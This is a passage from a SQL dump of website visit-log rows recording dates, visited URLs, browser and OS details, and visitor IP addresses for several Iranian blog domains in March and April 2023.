(30706,'2023-03-28','https://neginghavami.ir/blog/','Firefox Mobile','Android','111.0','mobile:smart','Unknown','','156.146.57.196','000',0,1,0),
(30707,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','82.199.130.41','000',0,2,0),
(30708,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','95.0.0.0','desktop','Unknown','','52.48.90.69','000',0,4,0),
(30709,'2023-03-28','https://neginghavami.ir/blog/','Chrome','OS X','90.0.0.0','desktop','Macintosh','','191.101.31.56','000',0,2,0),
(30710,'2023-03-28','https://neginghavami.ir/blog/','Firefox Mobile','Android','111.0','mobile:smart','Unknown','','165.231.253.221','000',0,2,0),
(30711,'2023-03-28','https://neginghavami.ir/blog/','Safari','iOS','16.0','mobile:smart','iPhone','','109.201.130.17','000',0,1,0),
(30712,'2023-03-28','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','137.184.27.81','000',0,2,0),
(30713,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','46.101.164.72','000',0,3,0),
(30714,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','64.57.140.140','000',0,2,0),
(30715,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','185.202.168.194','000',0,2,0),
(30716,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','185.202.168.16','000',0,1,0),
(30717,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','91.92.217.156','000',0,1,0),
(30718,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','168.151.124.242','000',0,1,0),
(30719,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','152.39.191.244','000',0,1,0),
(30720,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','196.242.115.15','000',0,1,0),
(30721,'2023-03-28','https://ictbank.ir/blog','Firefox','OS X','33.0','desktop','Macintosh','','196.245.237.127','000',0,2,0),
(30722,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','196.245.220.124','000',0,2,0),
(30723,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','216.19.203.165','000',0,1,0),
(30724,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','168.151.197.18','000',0,1,0),
(30725,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','168.151.135.21','000',0,1,0),
(30726,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','43.252.28.224','000',0,1,0),
(30727,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','95.215.37.134','000',0,1,0),
(30728,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.6','000',0,1,0),
(30729,'2023-03-28','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(30730,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','51.255.218.113','000',0,2,0),
(30731,'2023-03-28','https://ictbank.ir/blog','Firefox','Windows','109.0','desktop','Unknown','','35.88.108.30','000',0,2,0),
(30732,'2023-03-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(30733,'2023-03-28','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','107.150.96.133','000',0,9,0),
(30734,'2023-03-28','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.122.10.105','000',0,1,0),
(30735,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','177.73.233.245','000',0,2,0),
(30736,'2023-03-28','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','18.222.178.105','000',0,1,0),
(30737,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','78.114.13.194','000',0,127,0),
(30738,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','139.99.252.97','000',0,1,0),
(30739,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','51.195.55.167','000',0,1,0),
(30740,'2023-03-28','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,2,0),
(30741,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','37.19.196.242','000',0,1,0),
(30742,'2023-03-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(30743,'2023-03-29','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','80.0.0.0','desktop','Unknown','','185.119.81.106','000',0,2,0),
(30744,'2023-03-29','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(30745,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','101.0.0.0','desktop','Unknown','','52.250.30.131','000',0,1,0),
(30746,'2023-03-29','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','108.167.189.59','000',0,1,0),
(30747,'2023-03-29','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','52.14.73.113','000',0,1,0),
(30748,'2023-03-29','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.114.130.26','000',0,1,0),
(30749,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','54.236.32.31','000',0,1,0),
(30750,'2023-03-29','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','152.89.196.13','000',0,2,0),
(30751,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','67.205.60.164','000',0,2,0),
(30752,'2023-03-29','https://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.146','000',0,2,0),
(30753,'2023-03-29','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.242','000',0,10,0),
(30754,'2023-03-29','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(30755,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30756,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','23.90.160.146','000',0,1,0),
(30757,'2023-03-29','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(30758,'2023-03-29','https://ictbank.ir/hooman/admin/','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.183.99','000',0,2,0),
(30759,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','54.82.203.157','000',0,2,0),
(30760,'2023-03-29','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,4,0),
(30761,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','95.0.0.0','desktop','Unknown','','18.222.178.105','000',0,1,0),
(30762,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.222.168.115','000',0,1,0),
(30763,'2023-03-29','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','54.39.83.129','000',0,1,0),
(30764,'2023-03-29','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.71','000',0,2,0),
(30765,'2023-03-29','http://www.google.com/search?q=ictbank.ir&ie=utf-8','Firefox','Windows','41.0','desktop','Unknown','','161.202.19.131','000',0,1,0),
(30766,'2023-03-29','http://www.google.com/search?q=ictbank.ir&ie=utf-8','Firefox','Windows','41.0','desktop','Unknown','','163.107.74.136','000',0,1,0),
(30767,'2023-03-29','http://www.google.com/search?q=neginghavami.ir&ie=utf-8','Firefox','Windows','41.0','desktop','Unknown','','168.1.54.29','000',0,1,0),
(30768,'2023-03-29','http://www.google.com/search?q=neginghavami.ir&ie=utf-8','Firefox','Windows','41.0','desktop','Unknown','','163.107.74.139','000',0,1,0),
(30769,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','178.159.37.125','000',0,1,0),
(30770,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.236.157.238','000',0,1,0),
(30771,'2023-03-29','https://ictbank.ir/blog','Firefox','Windows','45.0','desktop','Unknown','','150.158.92.151','000',0,1,0),
(30772,'2023-03-29','https://ictbank.ir/blog','Vivaldi','Windows','5.0.0.0','desktop','Unknown','','37.46.113.203','000',0,8,0),
(30773,'2023-03-29','https://ictbank.ir/blog/','Opera','Windows','53.0.0.0','desktop','Unknown','','181.214.218.82','000',0,2,0),
(30774,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','51.89.52.198','000',0,2,0),
(30775,'2023-03-29','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.41','000',0,4,0),
(30776,'2023-03-29','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','83.120.227.164','000',0,4,0),
(30777,'2023-03-29','https://design-arena.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.87','000',0,2,0),
(30778,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(30779,'2023-03-29','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','176.223.136.99','000',0,127,0),
(30780,'2023-03-29','https://ictbank.ir/blog','Chrome','Linux','85.0.0.0','desktop','Unknown','','195.123.240.173','000',0,2,0),
(30781,'2023-03-29','https://ictbank.ir/blog','Chrome','Linux','85.0.0.0','desktop','Unknown','','195.123.241.30','000',0,3,0),
(30782,'2023-03-29','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(30783,'2023-03-29','http://45.92.94.221:80/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','103.149.27.53','000',0,3,0),
(30784,'2023-03-30','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.240.5.102','000',0,1,0),
(30785,'2023-03-30','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','162.0.220.49','000',0,1,0),
(30786,'2023-03-30','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(30787,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','80.0.0.0','desktop','Unknown','','54.163.7.176','000',0,1,0),
(30788,'2023-03-30','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,10,0),
(30789,'2023-03-30','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30790,'2023-03-30','https://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.136.78','000',0,2,0),
(30791,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(30792,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','81.161.59.17','000',0,6,0),
(30793,'2023-03-30','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.242','000',0,6,0),
(30794,'2023-03-30','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.198.0.155','000',0,1,0),
(30795,'2023-03-30','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.198.0.182','000',0,1,0),
(30796,'2023-03-30','https://ictbank.ir/blog','Opera','Windows','65.0.0.0','desktop','Unknown','','188.147.4.36','000',0,4,0),
(30797,'2023-03-30','https://ictbank.ir/blog','Opera','Windows','65.0.0.0','desktop','Unknown','','188.147.134.237','000',0,3,0),
(30798,'2023-03-30','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.227.8.234','000',0,1,0),
(30799,'2023-03-30','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','196.64.67.240','000',0,1,0),
(30800,'2023-03-30','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.127.45.45','000',0,1,0),
(30801,'2023-03-30','https://ictbank.ir/blog','Chrome','Linux','85.0.0.0','desktop','Unknown','','195.123.241.30','000',0,1,0),
(30802,'2023-03-30','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.66.38','000',0,1,0),
(30803,'2023-03-30','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.190','000',0,2,0),
(30804,'2023-03-30','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','167.172.92.148','000',0,2,0),
(30805,'2023-03-30','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(30806,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.38.251.56','000',0,1,0),
(30807,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','178.159.37.125','000',0,1,0),
(30809,'2023-03-30','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,3,0),
(30810,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.89.70.209','000',0,2,0),
(30811,'2023-03-30','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','165.227.223.152','000',0,1,0),
(30812,'2023-03-30','https://ictbank.ir/blog','Chrome','iOS','91.0.0.0','mobile:smart','iPhone','','185.87.199.84','000',0,1,0),
(30813,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','90.0.0.0','desktop','Unknown','','212.193.57.148','000',0,1,0),
(30814,'2023-03-30','https://ictbank.ir/blog','Chrome','Android','83.0.0.0','mobile:smart','Unknown','','93.158.192.227','000',0,1,0),
(30815,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.15','000',0,1,0),
(30816,'2023-03-30','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','209.17.114.78','000',0,1,0),
(30817,'2023-03-30','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','31.61.175.80','000',0,3,0),
(30818,'2023-03-30','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','188.147.12.9','000',0,2,0),
(30819,'2023-03-30','https://ictbank.ir/blog','Safari','Windows','Unknown','desktop','Unknown','','79.185.76.117','000',0,3,0),
(30820,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','37.225.74.17','000',0,1,0),
(30821,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','37.225.77.227','000',0,1,0),
(30822,'2023-03-30','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','79.185.76.121','000',0,1,0),
(30823,'2023-03-30','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.14.138.191','000',0,1,0),
(30824,'2023-03-30','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','95.211.87.209','000',0,1,0),
(30825,'2023-03-30','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','185.142.236.40','000',0,1,0),
(30826,'2023-03-30','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','114.7.149.178','000',0,1,0),
(30827,'2023-03-31','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','75.101.254.207','000',0,1,0),
(30828,'2023-03-31','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','67.231.26.219','000',0,3,0),
(30829,'2023-03-31','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','5.135.152.155','000',0,3,0),
(30830,'2023-03-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(30831,'2023-03-31','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','138.197.98.189','000',0,2,0),
(30832,'2023-03-31','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(30833,'2023-03-31','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30834,'2023-03-31','https://45.92.94.221/blog','Unknown','Unknown','Unknown','','Unknown','','185.156.46.135','000',0,1,0),
(30835,'2023-03-31','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','68.183.196.15','000',0,7,0),
(30836,'2023-03-31','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','149.28.77.240','000',0,1,0),
(30837,'2023-03-31','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(30838,'2023-03-31','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.97.249.40','000',0,1,0),
(30839,'2023-03-31','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','162.241.157.186','000',0,3,0),
(30840,'2023-03-31','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','45.76.181.146','000',0,3,0),
(30841,'2023-03-31','https://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','139.59.32.121','000',0,1,0),
(30842,'2023-03-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(30843,'2023-03-31','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,3,0),
(30844,'2023-03-31','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.161.50.17','000',0,1,0),
(30845,'2023-03-31','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(30846,'2023-03-31','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.176.170','000',0,1,0),
(30847,'2023-03-31','http://ictbank.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.40','000',0,2,0),
(30848,'2023-03-31','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.48','000',0,2,0),
(30849,'2023-03-31','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.112','000',0,1,0),
(30850,'2023-03-31','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','27.115.124.97','000',0,1,0),
(30851,'2023-03-31','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.176.14','000',0,2,0),
(30852,'2023-03-31','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.86.230','000',0,1,0),
(30853,'2023-03-31','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','103.149.27.166','000',0,2,0),
(30854,'2023-03-31','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.211.212','000',0,1,0),
(30855,'2023-03-31','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','45.158.49.169','000',0,4,0),
(30856,'2023-03-31','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,4,0),
(30857,'2023-03-31','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','109.74.206.124','000',0,2,0),
(30858,'2023-03-31','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','209.141.55.26','000',0,1,0),
(30859,'2023-03-31','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.32','000',0,1,0),
(30860,'2023-03-31','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','74.82.47.194','000',0,6,0),
(30861,'2023-03-31','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','104.192.3.74','000',0,1,0),
(30862,'2023-03-31','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.43','000',0,6,0),
(30863,'2023-03-31','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.246.188.74','000',0,6,0),
(30864,'2023-03-31','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,1,0),
(30865,'2023-03-31','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','124.244.66.207','000',0,127,0),
(30866,'2023-03-31','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','63.0','desktop','Unknown','','218.147.234.206','000',0,3,0),
(30867,'2023-03-31','https://ictbank.ir/blog','Chrome','Windows','27.0.0.0','desktop','Unknown','','52.51.218.89','000',0,1,0),
(30868,'2023-03-31','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','81.88.53.46','000',0,1,0),
(30869,'2023-03-31','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','198.12.149.182','000',0,1,0),
(30870,'2023-03-31','http://ictbank.ir','Edge','Windows','.0','desktop','Unknown','','89.185.85.140','000',0,1,0),
(30871,'2023-03-31','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(30872,'2023-03-31','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','170.39.77.82','000',0,1,0),
(30873,'2023-03-31','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','188.166.179.135','000',0,1,0),
(30874,'2023-03-31','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','91.121.79.58','000',0,1,0),
(30875,'2023-03-31','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','66.240.192.138','000',0,3,0),
(30876,'2023-03-31','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(30877,'2023-03-31','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','5.53.123.11','000',0,1,0),
(30878,'2023-03-31','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','83.102.155.40','000',0,1,0),
(30879,'2023-03-31','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','66.33.212.110','000',0,2,0),
(30880,'2023-03-31','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','44.213.68.247','000',0,2,0),
(30881,'2023-04-01','https://ictbank.ir/blog','Chrome','Windows','54.0.0.0','desktop','Unknown','','3.83.30.195','000',0,1,0),
(30882,'2023-04-01','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','104.248.1.96','000',0,2,0),
(30883,'2023-04-01','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','119.252.174.184','000',0,1,0),
(30884,'2023-04-01','https://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(30885,'2023-04-01','https://neginghavami.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','123.6.49.38','000',0,5,0),
(30886,'2023-04-01','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','123.6.49.6','000',0,3,0),
(30887,'2023-04-01','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','123.6.49.36','000',0,2,0),
(30888,'2023-04-01','https://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.122','000',0,4,0),
(30889,'2023-04-01','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(30890,'2023-04-01','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(30891,'2023-04-01','http://mail.design-arena.ir/blog/wp-login.php','Chrome','Windows','70.0.0.0','desktop','Unknown','','211.244.155.164','000',0,3,0),
(30892,'2023-04-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(30893,'2023-04-01','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(30894,'2023-04-01','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.46','000',0,1,0),
(30895,'2023-04-01','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.50','000',0,1,0),
(30896,'2023-04-01','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.60','000',0,1,0),
(30897,'2023-04-01','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30898,'2023-04-01','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','4.234.130.68','000',0,1,0),
(30899,'2023-04-01','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','109.169.10.2','000',0,3,0),
(30900,'2023-04-01','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.147','000',0,1,0),
(30901,'2023-04-01','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.13','000',0,3,0),
(30902,'2023-04-01','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.92.27.198','000',0,1,0),
(30903,'2023-04-01','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(30904,'2023-04-01','https://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.75','000',0,2,0),
(30905,'2023-04-01','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(30906,'2023-04-01','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.215.253.15','000',0,1,0),
(30907,'2023-04-01','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30908,'2023-04-01','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(30909,'2023-04-01','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','67.227.153.5','000',0,1,0),
(30910,'2023-04-01','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.163.109.66','000',0,2,0),
(30911,'2023-04-02','https://ictbank.ir:443','Chrome','Windows','17.0.0.0','desktop','Unknown','','198.50.168.189','000',0,2,0),
(30912,'2023-04-02','https://neginghavami.ir/blog','Chrome','Windows','101.0.0.0','desktop','Unknown','','106.75.126.108','000',0,5,0),
(30913,'2023-04-02','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30914,'2023-04-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(30915,'2023-04-02','https://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(30916,'2023-04-02','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.126','000',0,5,0),
(30917,'2023-04-02','https://neginghavami.ir/blog/','Chrome','Windows','67.0.0.0','desktop','Unknown','','181.214.218.82','000',0,1,0),
(30918,'2023-04-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(30919,'2023-04-02','https://ictbank.ir/blog/category/security/','Edge','Windows','90.0.0.0','desktop','Unknown','','37.139.53.30','000',0,12,0),
(30920,'2023-04-02','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','170.64.165.31','000',0,1,0),
(30921,'2023-04-02','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(30922,'2023-04-02','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','178.159.37.41','000',0,2,0),
(30923,'2023-04-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.114.130.26','000',0,1,0),
(30924,'2023-04-02','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.118.164.38','000',0,1,0),
(30925,'2023-04-02','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.64','000',0,1,0),
